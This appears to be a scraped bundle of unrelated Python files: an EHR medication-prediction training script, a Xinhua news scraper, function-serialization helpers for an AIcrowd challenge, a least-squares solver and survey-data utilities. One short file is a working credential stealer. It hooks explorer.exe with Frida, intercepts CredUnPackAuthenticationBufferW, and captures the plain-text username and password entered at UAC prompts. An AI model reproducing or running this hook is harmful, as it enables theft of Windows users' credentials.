return tokens
class EHRDataset(Dataset):
def __init__(self, data_pd, tokenizer: EHRTokenizer, max_seq_len):
self.data_pd = data_pd
self.tokenizer = tokenizer
self.seq_len = max_seq_len
self.sample_counter = 0
self.side_len = len(self.data_pd.iloc[0, 5:])
logger.info('side len %d' % self.side_len)
def transform_data(data):
"""
:param data: raw data form
:return: {subject_id, [adm, 2, codes]},
"""
records = {}
side_records = {}
for subject_id in data['SUBJECT_ID'].unique():
item_df = data[data['SUBJECT_ID'] == subject_id]
patient = []
sides = []
for _, row in item_df.iterrows():
admission = [list(row['ICD9_CODE']), list(row['ATC4'])]
patient.append(admission)
sides.append(row[5:].values)
if len(patient) < 2:
continue
records[subject_id] = patient
side_records[subject_id] = sides
return records, side_records
self.records, self.side_records = transform_data(data_pd)
def __len__(self):
return len(self.records)
def __getitem__(self, item):
cur_id = self.sample_counter
self.sample_counter += 1
subject_id = list(self.records.keys())[item]
def fill_to_max(l, seq):
while len(l) < seq:
l.append('[PAD]')
return l
"""extract input and output tokens
"""
input_tokens = [] # (2*max_len*adm)
output_dx_tokens = [] # (adm-1, l)
output_rx_tokens = [] # (adm-1, l)
for idx, adm in enumerate(self.records[subject_id]):
input_tokens.extend(
['[CLS]'] + fill_to_max(list(adm[0]), self.seq_len - 1))
input_tokens.extend(
['[CLS]'] + fill_to_max(list(adm[1]), self.seq_len - 1))
# output_rx_tokens.append(list(adm[1]))
if idx != 0:
output_rx_tokens.append(list(adm[1]))
output_dx_tokens.append(list(adm[0]))
"""convert tokens to id
"""
input_ids = self.tokenizer.convert_tokens_to_ids(input_tokens)
output_dx_labels = [] # (adm-1, dx_voc_size)
output_rx_labels = [] # (adm-1, rx_voc_size)
dx_voc_size = len(self.tokenizer.dx_voc_multi.word2idx)
rx_voc_size = len(self.tokenizer.rx_voc_multi.word2idx)
for tokens in output_dx_tokens:
tmp_labels = np.zeros(dx_voc_size)
tmp_labels[list(
map(lambda x: self.tokenizer.dx_voc_multi.word2idx[x], tokens))] = 1
output_dx_labels.append(tmp_labels)
for tokens in output_rx_tokens:
tmp_labels = np.zeros(rx_voc_size)
tmp_labels[list(
map(lambda x: self.tokenizer.rx_voc_multi.word2idx[x], tokens))] = 1
output_rx_labels.append(tmp_labels)
if cur_id < 5:
logger.info("*** Example ***")
logger.info("subject_id: %s" % subject_id)
logger.info("input tokens: %s" % " ".join(
[str(x) for x in input_tokens]))
logger.info("input_ids: %s" %
" ".join([str(x) for x in input_ids]))
assert len(input_ids) == (self.seq_len *
2 * len(self.records[subject_id]))
assert len(output_dx_labels) == (len(self.records[subject_id]) - 1)
# assert len(output_rx_labels) == len(self.records[subject_id])-1
"""extract side
"""
sides = self.side_records[subject_id][1:]
assert len(sides) == len(output_dx_labels)
cur_tensors = (torch.tensor(input_ids).view(-1, self.seq_len),
torch.tensor(output_dx_labels, dtype=torch.float),
torch.tensor(output_rx_labels, dtype=torch.float),
torch.tensor(sides, dtype=torch.float))
return cur_tensors
def load_dataset(args):
data_dir = args.data_dir
max_seq_len = args.max_seq_length
# load tokenizer
tokenizer = EHRTokenizer(data_dir)
# load data
data = pd.read_pickle(os.path.join(data_dir, 'data-multi-visit.pkl'))
# load side
side_pd = pd.read_pickle(os.path.join(data_dir, 'data-multi-side.pkl'))
# concat
data = data.merge(side_pd, how='inner', on=['SUBJECT_ID', 'HADM_ID'])
# load trian, eval, test data
ids_file = [os.path.join(data_dir, 'train-id.txt'),
os.path.join(data_dir, 'eval-id.txt'),
os.path.join(data_dir, 'test-id.txt')]
def load_ids(data, file_name):
"""
:param data: multi-visit data
:param file_name:
:return: raw data form
"""
ids = []
with open(file_name, 'r') as f:
for line in f:
ids.append(int(line.rstrip('\n')))
return data[data['SUBJECT_ID'].isin(ids)].reset_index(drop=True)
return tokenizer, tuple(map(lambda x: EHRDataset(load_ids(data, x), tokenizer, max_seq_len), ids_file))
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--model_name", default='GBert-predict-side', type=str, required=False,
help="model name")
parser.add_argument("--data_dir",
default='../data',
type=str,
required=False,
help="The input data dir.")
parser.add_argument("--pretrain_dir", default='../saved/GBert-predict', type=str, required=False,
help="pretraining model dir.")
parser.add_argument("--train_file", default='data-multi-visit.pkl', type=str, required=False,
help="training data file.")
parser.add_argument("--output_dir",
default='../saved/',
type=str,
required=False,
help="The output directory where the model checkpoints will be written.")
# Other parameters
parser.add_argument("--use_pretrain",
default=True,
action='store_true',
help="is use pretrain")
parser.add_argument("--graph",
default=False,
action='store_true',
help="if use ontology embedding")
parser.add_argument("--therhold",
default=0.3,
type=float,
help="therhold.")
parser.add_argument("--max_seq_length",
default=55,
type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_train",
default=False,
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
default=True,
action='store_true',
help="Whether to run on the dev set.")
parser.add_argument("--do_test",
default=True,
action='store_true',
help="Whether to run on the test set.")
parser.add_argument("--train_batch_size",
default=1,
type=int,
help="Total batch size for training.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=40.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument('--seed',
type=int,
default=1203,
help="random seed for initialization")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
args = parser.parse_args()
args.output_dir = os.path.join(args.output_dir, args.model_name)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
device = torch.device("cuda" if torch.cuda.is_available()
and not args.no_cuda else "cpu")
if not args.do_train and not args.do_eval:
raise ValueError(
"At least one of `do_train` or `do_eval` must be True.")
# if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
# raise ValueError(
# "Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
print("Loading Dataset")
tokenizer, (train_dataset, eval_dataset, test_dataset) = load_dataset(args)
train_dataloader = DataLoader(train_dataset,
sampler=RandomSampler(train_dataset),
batch_size=1)
eval_dataloader = DataLoader(eval_dataset,
sampler=SequentialSampler(eval_dataset),
batch_size=1)
test_dataloader = DataLoader(test_dataset,
sampler=SequentialSampler(test_dataset),
batch_size=1)
print('Loading Model: ' + args.model_name)
# config = BertConfig(vocab_size_or_config_json_file=len(tokenizer.vocab.word2idx), side_len=train_dataset.side_len)
# config.graph = args.graph
# model = SeperateBertTransModel(config, tokenizer.dx_voc, tokenizer.rx_voc)
if args.use_pretrain:
logger.info("Use Pretraining model")
model = GBERT_Predict_Side.from_pretrained(
args.pretrain_dir, tokenizer=tokenizer, side_len=train_dataset.side_len)
else:
config = BertConfig(
vocab_size_or_config_json_file=len(tokenizer.vocab.word2idx))
config.graph = args.graph
model = GBERT_Predict_Side(config, tokenizer, train_dataset.side_len)
logger.info('# of model parameters: ' + str(get_n_params(model)))
model.to(device)
model_to_save = model.module if hasattr(
model, 'module') else model # Only save the model it-self
rx_output_model_file = os.path.join(
args.output_dir, "pytorch_model.bin")
# Prepare optimizer
# num_train_optimization_steps = int(
# len(train_dataset) / args.train_batch_size) * args.num_train_epochs
# param_optimizer = list(model.named_parameters())
# no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
# optimizer_grouped_parameters = [
# {'params': [p for n, p in param_optimizer if not any(
# nd in n for nd in no_decay)], 'weight_decay': 0.01},
# {'params': [p for n, p in param_optimizer if any(
# nd in n for nd in no_decay)], 'weight_decay': 0.0}
# ]
# optimizer = BertAdam(optimizer_grouped_parameters,
# lr=args.learning_rate,
# warmup=args.warmup_proportion,
# t_total=num_train_optimization_steps)
optimizer = Adam(model.parameters(), lr=args.learning_rate)
global_step = 0
if args.do_train:
writer = SummaryWriter(args.output_dir)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Batch size = %d", 1)
dx_acc_best, rx_acc_best = 0, 0
acc_name = 'prauc'
dx_history = {'prauc': []}
rx_history = {'prauc': []}
for _ in trange(int(args.num_train_epochs), desc="Epoch"):
print('')
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
prog_iter = tqdm(train_dataloader, leave=False, desc='Training')
model.train()
for _, batch in enumerate(prog_iter):
batch = tuple(t.to(device) for t in batch)
input_ids, dx_labels, rx_labels, input_sides = batch
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
dim=0), dx_labels.squeeze(dim=0), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
loss, rx_logits = model(input_ids, dx_labels=dx_labels, rx_labels=rx_labels,
epoch=global_step, input_sides=input_sides)
loss.backward()
tr_loss += loss.item()
nb_tr_examples += 1
nb_tr_steps += 1
# Display loss
prog_iter.set_postfix(loss='%.4f' % (tr_loss / nb_tr_steps))
optimizer.step()
optimizer.zero_grad()
writer.add_scalar('train/loss', tr_loss / nb_tr_steps, global_step)
global_step += 1
if args.do_eval:
print('')
logger.info("***** Running eval *****")
model.eval()
rx_y_preds = []
rx_y_trues = []
for eval_input in tqdm(eval_dataloader, desc="Evaluating"):
eval_input = tuple(t.to(device) for t in eval_input)
input_ids, dx_labels, rx_labels, input_sides = eval_input
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
), dx_labels.squeeze(), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
with torch.no_grad():
loss, rx_logits = model(
input_ids, dx_labels=dx_labels, rx_labels=rx_labels, input_sides=input_sides)
rx_y_preds.append(t2n(torch.sigmoid(rx_logits)))
rx_y_trues.append(t2n(rx_labels))
print('')
rx_acc_container = metric_report(np.concatenate(rx_y_preds, axis=0), np.concatenate(rx_y_trues, axis=0),
args.therhold)
writer.add_scalars(
'eval_rx', rx_acc_container, global_step)
if rx_acc_container[acc_name] > rx_acc_best:
rx_acc_best = rx_acc_container[acc_name]
# save model
torch.save(model_to_save.state_dict(),
rx_output_model_file)
with open(os.path.join(args.output_dir, 'bert_config.json'), 'w', encoding='utf-8') as fout:
fout.write(model.config.to_json_string())
if args.do_test:
logger.info("***** Running test *****")
logger.info(" Num examples = %d", len(test_dataset))
logger.info(" Batch size = %d", 1)
def test(task=0):
# Load a trained model that you have fine-tuned
model_state_dict = torch.load(rx_output_model_file)
model.load_state_dict(model_state_dict)
model.to(device)
model.eval()
y_preds = []
y_trues = []
for test_input in tqdm(test_dataloader, desc="Testing"):
test_input = tuple(t.to(device) for t in test_input)
input_ids, dx_labels, rx_labels, input_sides = test_input
input_ids, dx_labels, rx_labels, input_sides = input_ids.squeeze(
), dx_labels.squeeze(), rx_labels.squeeze(dim=0), input_sides.squeeze(dim=0)
with torch.no_grad():
loss, rx_logits = model(
input_ids, dx_labels=dx_labels, rx_labels=rx_labels, input_sides=input_sides)
y_preds.append(t2n(torch.sigmoid(rx_logits)))
y_trues.append(t2n(rx_labels))
print('')
acc_container = metric_report(np.concatenate(y_preds, axis=0), np.concatenate(y_trues, axis=0),
args.therhold)
# save report
writer.add_scalars('test', acc_container, 0)
return acc_container
test(task=0)
if __name__ == "__main__":
main()
|
1697984
|
from bs4 import BeautifulSoup
from datetime import datetime
from threading import Lock
mutex = Lock()
class AdapterXinhua:
def __init__(self):
self.clear()
def clear(self):
self.name = 'xinhua'
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
}
self.links = set()
self.linksPos = 0
self.initCnt = 0
self.category = {
0: '国际',
1: '时政',
2: '军事',
3: '科技'
}
self.hostList = [
'http://www.xinhuanet.com/world',
'http://www.xinhuanet.com/politics',
'http://www.xinhuanet.com/mil',
'http://www.xinhuanet.com/tech',
'http://www.xinhuanet.com/',
'http://www.xinhuanet.com/world/hqlft2017/',
'http://www.xinhuanet.com/world/hqgc.htm',
'http://www.xinhuanet.com/world/wmyl.htm',
'http://www.xinhuanet.com/politics/xgc.htm',
'http://www.xinhuanet.com/politics/ytgz.htm',
'http://www.xinhuanet.com/politics/szzt.htm',
'http://www.xinhuanet.com/tech/hlwj.htm',
'http://www.xinhuanet.com/tech/Eyt.htm',
'http://www.xinhuanet.com/tech/wgc.htm',
'http://www.xinhuanet.com/tech/ijm.htm',
'http://www.xinhuanet.com/tech/sxj.htm',
'http://www.xinhuanet.com/tech/cyb.htm',
'http://www.xinhuanet.com/tech/5gsd/index.htm'
]
self.initCntLimit = len(self.hostList)
# self.initCntLimit = 1
self.validCnt = 0
self.existLinks = set()
def addValidLink(self, link):
self.existLinks.add(link)
def host(self, op):
return self.hostList[op]
def init(self, op, text):
def strip(x):
ps = x.find('#')
if ps != -1:
x = x[:ps]
ps = x.find('?')
if ps != -1:
x = x[:ps]
return x
bs = BeautifulSoup(text, 'html.parser')
for lks in bs.find_all('a'):
lk = str(lks.get('href'))
if lk.startswith(self.host(0) + '/2018') or \
lk.startswith(self.host(1) + '/2018') or \
lk.startswith(self.host(2) + '/2018'):
lk = strip(lk)
if lk not in self.existLinks:
self.links.add(lk)
def hasNextInit(self):
return self.initCnt < self.initCntLimit
def nextInitParam(self):
self.initCnt += 1
return 0, self.host(self.initCnt - 1), self.headers, {}
def eval(self, op, text):
# title, stamp, content, category, source, url
data = dict()
bs = BeautifulSoup(text, 'html.parser')
def escape(x):
x = x.replace(u'\xa0', u' ')
x = x.replace(u'\u3000', u' ')
x = x.strip()
return x
def parseContent(x):
bg = x.find('<p')
ed = x.rfind('</p>')
if bg == -1:
return x
ed += 4
return x[bg:ed]
cat = 0
for i in range(len(self.category)):
if self.links[op].startswith(self.host(i)):
cat = i
data['category'] = self.category[i]
a = None
if cat in [0, 1]:
a = bs.find('div', attrs={'class': 'h-title'})
elif cat == 2:
a = bs.find('h1', attrs={'id': 'title'})
if a:
data['title'] = escape(a.text)
if cat in [0, 1]:
a = bs.find('span', attrs={'class': 'h-time'})
elif cat == 2:
a = bs.find('span', attrs={'class': 'time'})
if a:
if cat in [0, 1]:
a = datetime.strptime(escape(a.text), '%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%d %H:%M:%S')
elif cat == 2:
a = datetime.strptime(escape(a.text), '%Y年%m月%d日 %H:%M:%S').strftime('%Y-%m-%d %H:%M:%S')
data['stamp'] = a
a = bs.find('em', attrs={'id': 'source'})
if a:
data['source'] = {'link': '', 'text': escape(a.text)}
if cat in [0, 1]:
a = bs.find('div', attrs={'id': 'p-detail'})
elif cat == 2:
a = bs.find('div', attrs={'class': 'article'})
if a and ''.join(a.text.split()):
data['content'] = parseContent(str(a))
ID = None
if 'content' in data and data['content']:
mutex.acquire()
self.validCnt += 1
ID = self.name + '_' + str(len(self.existLinks) + self.validCnt)
mutex.release()
data['url'] = self.links[op]
return ID, data
def hasNext(self):
if self.linksPos == 0:
self.links = list(self.links)
self.validCnt = 0
return self.linksPos < len(self.links)
def nextParam(self):
self.linksPos += 1
return self.linksPos - 1, self.links[self.linksPos - 1], self.headers, {}
def encoding(self):
return "utf-8"
|
1697986
|
import os
import dill
import numpy as np
def get_function_path(base_path=None, experiment_name=None, make=True):
"""
This function gets the path to where the function is expected to be stored.
Parameters
----------
base_path : str
Path to the directory where the experiments are to be stored.
This defaults to AICROWD_OUTPUT_PATH (see `get_config` above) and which in turn
defaults to './scratch/shared'.
experiment_name : str
Name of the experiment. This defaults to AICROWD_EVALUATION_NAME which in turn
defaults to 'experiment_name'.
make : Makes the directory where the returned path leads to (if it doesn't exist already)
Returns
-------
str
Path to where the model should be stored (to be found by the evaluation function later).
"""
base_path = os.getenv("AICROWD_OUTPUT_PATH","../scratch/shared") \
if base_path is None else base_path
experiment_name = os.getenv("AICROWD_EVALUATION_NAME", "experiment_name") \
if experiment_name is None else experiment_name
model_path = os.path.join(base_path, experiment_name, 'representation', 'python_model.dill')
if make:
os.makedirs(os.path.dirname(model_path), exist_ok=True)
os.makedirs(os.path.join(os.path.dirname(model_path), 'results'), exist_ok=True)
return model_path
def export_function(fn, path=None):
"""
Exports a function. This tries to serialize the argument `fn`, which must be callable
and expect as input a numpy tensor of shape NCHW, where N (batch-size) can be arbitrary,
C (channel) is the number of input channels, and (H, W) are the dimensions of the image.
There are no guarantees that the serialization works as expected - you should double
check that this is indeed the case by importing the function.
Parameters
----------
fn : callable
Function to be serialized.
path : str
Path to the file where the function is saved. Defaults to the value set by the
`get_model_path` function above.
Returns
-------
str
Path to where the function is saved.
"""
assert callable(fn), "Provided function should at least be callable..."
path = get_function_path() if path is None else path
with open(path, 'wb') as f:
dill.dump(fn, f, protocol=dill.HIGHEST_PROTOCOL)
return path
def import_function(path=None):
"""
Imports a function from file.
Parameters
----------
path : str
Path to where the function is saved. Defaults to the return value of `get_function_path`
function defined above.
Returns
-------
callable
"""
path = get_function_path() if path is None else path
with open(path, 'rb') as f:
# Here goes nothing...
fn = dill.load(f)
return fn
def make_representor(fn, format='NCHW'):
"""
Wraps a function in another callable that can be used by `disentanglement_lib`.
Parameters
----------
fn : callable
Function to be wrapped.
format : str
Input format expected by `fn`. Can be NCHW or NHWC, where
N: batch
C: channels
H: height
W: width
Returns
-------
callable
"""
assert format in ['NCHW', 'NHWC'], f"format must either be NCHW or NHWC; got {format}."
def _represent(x):
assert isinstance(x, np.ndarray), \
f"Input to the representation function must be a ndarray, got {type(x)} instead."
assert x.ndim == 4, \
f"Input to the representation function must be a four dimensional NHWC array, " \
f"got a {x.ndim}-dimensional array of shape {x.shape} instead."
# Convert from NHWC to NCHW
if format == 'NCHW':
x = np.moveaxis(x, 3, 1)
N, C, H, W = x.shape
else:
N, H, W, C = x.shape
# Call the function on the array and validate its shape
y = fn(x)
assert isinstance(y, np.ndarray), f"Output from the representation function " \
f"should be a numpy array, got {type(y)} instead."
assert y.ndim == 2, "Output from the representation function should be two dimensional."
return y
return _represent
|
1698092
|
from PyHook import wait_for_process, on_credential_submit, log
import frida
import sys
hook_process_name = "explorer"
def logger(message):
log(hook_process_name, message)
def wait_for():
hook()
def hook():
try:
logger("Trying To Hook Into Explorer")
session = frida.attach("explorer.exe")
logger(f"Hooked Explorer")
# We Listen to the CredUnPackAuthenticationBufferW func from Credui.dll to catch the user and pass in plain text
script = session.create_script("""
var username;
var password;
var CredUnPackAuthenticationBufferW = Module.findExportByName("Credui.dll", "CredUnPackAuthenticationBufferW")
Interceptor.attach(CredUnPackAuthenticationBufferW, {
onEnter: function (args)
{
username = args[3];
password = args[7];
},
onLeave: function (result)
{
var user = username.readUtf16String()
var pass = password.readUtf16String()
if (user && pass)
{
send("\\n=============================" + "\\n[+] Intercepted Creds from UAC" + "\\nUsername : " + user + "\\nPassword : " + pass +"\\n=============================" );
}
}
});
""")
# If we found the user and pass then execute "on_message_credui" function
script.on('message', on_credential_submit)
script.load()
sys.stdin.read()
except Exception as e:
logger("Unhandled exception: " + str(e))
logger("Continuing...")
|
1698109
|
import numpy as np
from scipy.sparse import linalg
def weighted_mean(x, w):
# numpy.average can do the same computation
assert(x.shape == w.shape)
s = w.sum()
if s == 0:
raise ValueError("Sum of weights is zero")
return (x * w).sum() / s
def get_solver_(method, **kwargs):
def lstsq(A, b):
x, _, _, _ = np.linalg.lstsq(A, b, **kwargs)
return x
def cg(A, b):
x, _ = linalg.cg(np.dot(A.T, A), np.dot(A.T, b), **kwargs)
return x
if method == "lstsq":
return lstsq
if method == "cg":
return cg
def solve_linear_equation(A, b, weights=None, method="lstsq", **kwargs):
solve = get_solver_(method)
assert(A.shape[0] == b.shape[0])
if weights is None:
return solve(A, b)
assert(A.shape[0] == weights.shape[0])
w = np.sqrt(weights)
b = b * w
A = A * w.reshape(-1, 1)
return solve(A, b)
|
1698138
|
import numpy as np
import pandas as pd
import quantipy as qp
import copy
import re
import warnings
from quantipy.core.tools.dp.query import uniquify_list
from quantipy.core.helpers.functions import (
emulate_meta,
cpickle_copy,
get_rules_slicer,
get_rules,
paint_dataframe
)
from quantipy.core.tools.view.logic import (
has_any,
get_logic_index,
intersection
)
from quantipy.core.rules import Rules
def recode_into(data, col_from, col_to, assignment, multi=False):
''' Recodes one column based on the values of another column
codes = [([10, 11], 1), ([8, 9], 2), ([1, 2, 3, 5, 6, 7, ], 3)]
data = recode_into(data, 'CONNECTIONS4', 'CONNECTIONS4_nps', codes)
'''
s = pd.Series()
for group in assignment:
for val in group[0]:
data[col_to] = np.where(data[col_from] == val, group[1], np.NaN)
s = s.append(data[col_to].dropna())
data[col_to] = s
return data
def create_column(name, type_name, text='', values=None):
''' Returns a column object that can be stored into a Quantipy meta
document.
'''
column = {
'name': name,
'type': type_name,
'text': text
}
if not values is None:
column['values'] = values
return column
def define_multicodes(varlist, meta):
multicodes = {}
for var in varlist:
multicodes.update({var: [mrs_q for mrs_q in meta['columns'] if mrs_q.startswith(var + '_')]})
return multicodes
def dichotomous_from_delimited(ds, value_map=None, sep=';', trailing_sep=True,
dichotom=[1, 2]):
''' Returns a dichotomous set DataFrame from ds, being a series storing
delimited set data separated by 'sep'
ds - (pandas.Series) a series storing delimited set data
value_map - (list-like, optional) the values to be anticipated as unique
in ds
sep - (str, optional) the character/s to use to delimit ds
trailing_sep - (bool, optional) is sep trailing all items in ds?
dichotom - (list-like, optional) the dochotomous values to use [yes, no]
'''
ds_split = ds.dropna().str.split(';')
if value_map is None:
value_map = get_delimited_value_map(ds, ds_split, sep)
df = pd.DataFrame(data=dichotom[1], index=ds.index, columns=value_map)
for idx in ds_split.index:
if trailing_sep:
cols = ds_split.loc[idx][:-1]
else:
cols = ds_split.loc[idx][:]
df.loc[idx][cols] = dichotom[0]
return df
def get_delimited_value_map(ds, ds_split=None, sep=';'):
''' Returns a sorted list of unique values found in ds, being a series
storing delimited set data separated by sep
ds - (pandas.Series) a series storing delimited set data
ds_split - (pandas.DataFrame, optional) an Excel-style text-to-columns
version of ds
sep - (str, optional) the character/s to use to delimit ds
'''
if ds_split is None:
ds_split = ds.dropna().str.split(sep)
delimited = pd.DataFrame(ds_split.tolist())
value_map = pd.unique(delimited.values.ravel())
value_map = np.sort(value_map[value_map.nonzero()])
return value_map
def derotate_column_group(data, cols, rotation_name='rotation',
data_name='data', dropna=True,
rotation_map=None):
''' Stacks the given columns from data, optionally renaming the
resultiong rotation and data columns, mapping the values found in
the rotation column, and appending the rotation column onto the index.
Parameters
----------
data : pandas.DataFrame
The data from which the hierarchical groups are being drawn.
cols : list
A list column names that need to be stacked from the source
data.
rotation_name : str
The name to be given to the rotation series that results from
the pandas.DataFrame.stack() operation.
data_name : str
The name to be given to the data series that results from
the pandas.DataFrame.stack() operation.
dropna: boolean (optional; default=True)
Passed through to the pandas.DataFrame.stack() operation.
rotation_map: list (optional; default=None)
The list of values/labels used to identify each resulting
stacked row. Using a mapper allows multi-question hierarchies
to be merged together because the resulting MultiIndexes will
match.
'''
# For multi-level hierarchies, capture the new level number about
# to be added|
if isinstance(data.index, pd.MultiIndex):
new_level = len(data.index.levels)
else:
new_level = 1
df = data[cols].stack(dropna=dropna).reset_index(level=[new_level])
df.columns = [rotation_name, data_name]
if not rotation_map is None:
df[rotation_name] = df[rotation_name].map(rotation_map)
df.set_index([rotation_name], append=True, drop=True, inplace=True)
return df
def derotate(data, input_mapper, output_mapper, others=None, dropna=True):
"""
Derotate data using the given input_mapper, and appending others.
This function derotates data using the specification defined in
input_mapper, which is a list of dicts of lists, describing how
columns from data can be read as a heirarchical structure.
Parameters
----------
data : pandas.DataFrame
The data from which the hierarchical groups are being drawn.
input_mapper : list of dicts of lists
A list of dicts matching where the new column names are keys to
to lists of source columns.
output_mapper : dict
The name and values to be given to the rotation index in the
output dataframe.
others: list (optional; default=None)
A list of additional columns from the source data to be appended
to the end of the resulting stacked dataframe.
dropna: boolean (optional; default=True)
Passed through to the pandas.DataFrame.stack() operation.
Returns
----------
df : pandas.DataFrame
The stacked dataframe.
"""
# For multi-level hierarchies, capture the new level number about
# to be added|
if isinstance(data.index, pd.MultiIndex):
new_level = len(data.index.levels)
else:
new_level = 1
rotation_name = output_mapper.keys()[0]
rotation_index = output_mapper[rotation_name]
# Collect all of the stacked column groups into a list
dfs = []
for question_group in input_mapper:
question_name = question_group.keys()[0]
question_columns = question_group.values()[0]
df = derotate_column_group(
data=data,
cols=question_columns,
rotation_name=rotation_name,
data_name=question_name,
dropna=dropna,
rotation_map=dict(zip(question_columns, rotation_index))
)
dfs.append(df)
# Join all of the stacked dataframes together
df = pd.concat(dfs, axis=1)
if not others is None:
# Merge in additional columns from the source data
df.reset_index(level=[new_level], inplace=True)
df = df.join(data[others])
df.set_index([rotation_name], append=True, drop=True, inplace=True)
return df
def start_meta(text_key='main'):
"""
Starts a new Quantipy meta document.
Parameters
----------
text_key : str, default='main'
The default text key to be set into the new meta document.
Returns
-------
meta : dict
Quantipy meta object
"""
meta = {
'info': {
'text': ''
},
'lib': {
'default text': text_key,
'values': {}
},
'columns': {},
'masks': {},
'sets': {
'data file': {
'text': {text_key: 'Variable order in source file'},
'items': []
}
},
'type': 'pandas.DataFrame'
}
return meta
def condense_dichotomous_set(df, values_from_labels=True, sniff_single=False,
yes=1, no=0, values_regex=None):
"""
Condense the given dichotomous columns to a delimited set series.
Parameters
----------
df : pandas.DataFrame
The column/s in the dichotomous set. This may be a single-column
DataFrame, in which case a non-delimited set will be returned.
values_from_labels : bool, default=True
Should the values used for each response option be taken from
the dichotomous column names using the rule name.split('_')[-1]?
If not then the values will be sequential starting from 1.
sniff_single : bool, default=False
Should the returned series be given as dtype 'int' if the
maximum number of responses for any row is 1?
Returns
-------
series: pandas.series
The converted series
"""
# Anything not counted as yes or no should be treated as no
df = df.applymap(lambda x: x if x in [yes, no] else no)
# Convert to delimited set
df_str = df.astype('str')
for v, col in enumerate(df_str.columns, start=1):
if values_from_labels:
if values_regex is None:
v = col.split('_')[-1]
else:
try:
v = str(int(re.match(values_regex, col).groups()[0]))
except AttributeError:
raise AttributeError(
"Your values_regex may have failed to find a match"
" using re.match('{}', '{}')".format(
values_regex, col))
else:
v = str(v)
# Convert to categorical set
df_str[col].replace(
{
'nan': 'nan',
'{}.0'.format(no): 'nan',
'{}'.format(no): 'nan'
},
inplace=True
)
df_str[col].replace(
{
'{}'.format(yes): v,
'{}.0'.format(yes): v
},
inplace=True
)
# Concatenate the rows
series = df_str.apply(
lambda x: ';'.join([
v
for v in x.tolist()
if v != 'nan'
]),
axis=1
)
# Add trailing delimiter
series = series + ';'
# Use NaNs to represent emtpy
series.replace(
{';': np.NaN},
inplace=True
)
if df.dropna().size==0:
# No responses are known, return filled with NaN
return series
if sniff_single and df.sum(axis=1).max()==1:
# Convert to float
series = series.str.replace(';','').astype('float')
return series
return series
def split_series(series, sep, columns=None):
"""
Splits all the items of a series using the given delimiter.
Splits each item in series using the given delimiter and returns
a DataFrame (as per Excel text-to-columns). Optionally, you can
pass in a list of column names that should be used to name the
resulting columns.
Parameters
----------
series : pandas.Series
The series that should be split.
sep : str
The separator that should be used to split the series.
columns : list-list, default=None
A list of names that should be set into the resulting DataFrame
columns.
Returns
-------
df : pandas.DataFrame
Series, split by sep, returned as a DataFrame.
"""
df = pd.DataFrame(series.astype('str').str.split(sep).tolist())
if not columns is None:
df.columns = columns
return df
def frange(range_def, sep=','):
"""
Return the full, unabbreviated list of ints suggested by range_def.
This function takes a string of abbreviated ranges, possibly
delimited by a comma (or some other character) and extrapolates
its full, unabbreviated list of ints.
Parameters
----------
range_def : str
The range string to be listed in full.
sep : str, default=','
The character that should be used to delimit discrete entries in
range_def.
Returns
-------
res : list
The exploded list of ints indicated by range_def.
"""
res = []
for item in range_def.split(sep):
if '-' in item:
a, b = item.split('-')
a, b = int(a), int(b)
lo = min([a, b])
hi = max([a, b])
ints = range(lo, hi+1)
if b <= a:
ints = list(reversed(ints))
res.extend(ints)
else:
res.append(int(item))
return res
def frequency(meta, data, x=None, y=None, weight=None, rules=False, **kwargs):
"""
Return a type-appropriate frequency of x.
This function uses the given meta and data to create a
type-appropriate frequency table of the named x variable.
The result may be either counts or column percentages, weighted
or unweighted.
Parameters
----------
meta : dict
Quantipy meta document.
data : pandas.DataFrame
Data accompanying the given meta document.
x : str, default=None
The column of data for which a frequency should be generated
on the x-axis.
y : str, default=None
The column of data for which a frequency should be generated
on the y-axis.
kwargs : kwargs
All remaining keyword arguments will be passed along to the
crosstab function.
Returns
-------
f : pandas.DataFrame
The frequency as a pandas DataFrame.
"""
if x is None and y is None:
raise ValueError(
"You must provide a value for either x or y."
)
elif not x is None and not y is None:
raise ValueError(
"You may only provide a value for either x or y, and not"
" both, when generating a frequency."
)
if rules and isinstance(rules, bool):
rules = ['x', 'y']
if x is None:
x = '@'
col = y
if rules:
rules_axis = 'y'
transpose = True
if not 'y' in rules:
rules = False
else:
y = '@'
col = x
if rules:
rules_axis = 'x'
transpose = False
if not 'x' in rules:
rules = False
if rules:
try:
if col in meta['columns']:
rules = meta['columns'][col]['rules'][rules_axis]
elif col in meta['masks']:
rules = meta['masks'][col]['rules'][rules_axis]
except:
rules = False
if not qp.OPTIONS['new_rules']:
try:
with_weight = rules['sortx']['with_weight']
except:
with_weight = weight
else:
with_weight = weight
else:
with_weight = weight
f = crosstab(
meta, data, x, y,
weight=with_weight,
rules=False,
xtotal=False,
**kwargs)
if rules:
if not qp.OPTIONS['new_rules']:
if transpose:
f = f.T
rules_slicer = get_rules_slicer(f, rules)
f = f.loc[rules_slicer]
if transpose:
f = f.T
else:
f = crosstab(
meta, data, x, y,
weight=with_weight,
rules=True,
xtotal=False,
**kwargs)
return f
